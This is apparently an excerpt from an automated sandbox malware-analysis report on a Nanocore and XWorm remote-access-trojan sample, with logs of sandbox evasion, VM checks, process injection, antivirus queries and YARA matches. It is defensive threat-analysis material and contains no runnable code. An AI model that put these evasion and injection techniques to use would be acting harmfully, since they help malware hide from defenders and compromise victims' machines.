Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory allocated: 4E30000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Window / User API: threadDelayed 4580	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Window / User API: threadDelayed 5192	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Window / User API: threadDelayed 5225	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Window / User API: threadDelayed 4600	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Window / User API: foregroundWindowGot 696	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Window / User API: foregroundWindowGot 923	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe TID: 8076	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe TID: 8076	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe TID: 8080	Thread sleep count: 4580 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe TID: 8080	Thread sleep count: 5192 > 30	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe TID: 7856	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe TID: 3120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Networks!.exe TID: 7448	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Thread delayed: delay time: 922337203685477

Source: Networks!.exe, 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: new policy.scr.exe, 00000000.00000002.1884717220.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Networks!.exe, 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: new policy.scr.exe, 00000003.00000002.2862345788.00000000066BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4091977760.00000000007B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\new policy.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\new policy.scr.exe

Code function: 3_2_0145D01C LdrInitializeThunk,

3_2_0145D01C

Enables debug privileges

Source: C:\Users\user\Desktop\new policy.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\new policy.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, NativeMethods.cs	Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, ResourceReferenceValue.cs	Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\new policy.scr.exe	Memory written: C:\Users\user\Desktop\new policy.scr.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory written: C:\Users\user\AppData\Roaming\Networks!.exe base: 700000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Memory written: C:\Users\user\AppData\Roaming\Networks!.exe base: 400000 value starts with: 4D5A	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe "C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe"	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process created: C:\Users\user\Desktop\new policy.scr.exe "C:\Users\user\Desktop\new policy.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Process created: C:\Users\user\AppData\Roaming\Networks!.exe "C:\Users\user\AppData\Roaming\Networks!.exe"	Jump to behavior

Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000033E4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q<
Source: new policy.scr.exe, 00000003.00000002.2865661587.000000000714B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager(
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003403000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|>@
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q6k
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003430000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qD
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000339E000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000034EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx5f
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000034EA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qXGO
Source: new policy.scr.exe, 00000003.00000002.2862287242.000000000669C000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4Ck
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q8
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000034AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q</N
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003739000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000037DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q`
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHq
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000037D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qd
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003536000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003516000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.000000000340A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,mk
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,#}
Source: new policy.scr.exe, 00000003.00000002.2879812341.0000000007ECC000.00000004.00000010.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2879987019.000000000800C000.00000004.00000010.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2832562480.000000000181E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program ManagerManager
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,Me
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qhgo
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000036FA000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003739000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager0~S
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.00000000037DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qX
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003511000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qP'Q
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003511000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q\|
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003536000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003516000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003739000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qdXt
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003536000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qHQU
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qvd
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q4Zo
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qTQd
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000332F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qp
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^ql\a
Source: new policy.scr.exe, 00000003.00000002.2865122228.0000000006D8E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program ManagerR
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qtGe
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qt
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qx
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000339E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q$':
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,-u
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000037DD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003739000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qLv{
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003554000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qH1X
Source: new policy.scr.exe, 00000003.00000002.2835253359.000000000368F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q,-k
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003536000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.000000000340A000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerlB^q
Source: airlineagancy.casacam.net 7076.exe, 00000002.00000002.4094137301.000000000269E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000037B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q(B\|
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003566000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q("W
Source: new policy.scr.exe, 00000003.00000002.2835253359.00000000035E8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT9`

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Users\user\Desktop\new policy.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Users\user\Desktop\new policy.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Users\user\AppData\Roaming\Networks!.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Users\user\AppData\Roaming\Networks!.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Users\user\AppData\Roaming\Networks!.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Users\user\AppData\Roaming\Networks!.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\new policy.scr.exe

Code function: 3_2_07758C68 GetSystemTimes,

3_2_07758C68

Source: C:\Users\user\Desktop\new policy.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\new policy.scr.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Nanocore RAT

Source: Yara match	File source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.275a4e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.59e0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2327789577.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2274074926.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
